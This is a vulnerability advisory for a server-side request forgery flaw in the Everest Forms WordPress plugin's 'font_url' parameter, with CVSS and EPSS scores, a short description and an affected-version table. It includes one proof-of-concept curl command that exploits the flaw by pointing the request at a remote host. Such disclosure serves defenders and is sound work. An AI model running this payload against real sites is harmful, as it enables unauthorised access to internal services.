7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
6.5 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.2%
Description The Everest Forms plugin for WordPress is vulnerable to Server-Side Request Forgery via the ‘font_url’ parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. It is worth mentioning that while the fix prevents the attack, it broke the Load Fonts Locally
functionality.
Make sure the option Load Fonts Locally
is enabled. curl --url ‘http://target_site.tld/wp-admin/admin-ajax.php?action=everest_forms_get_local_font_url’ --data ‘font_url=http://remote-host.tld:$PORT/?bypass=https://fonts.googleapis.com’
CPE | Name | Operator | Version |
---|---|---|---|
eq | 2.0.8 |
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
6.5 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.2%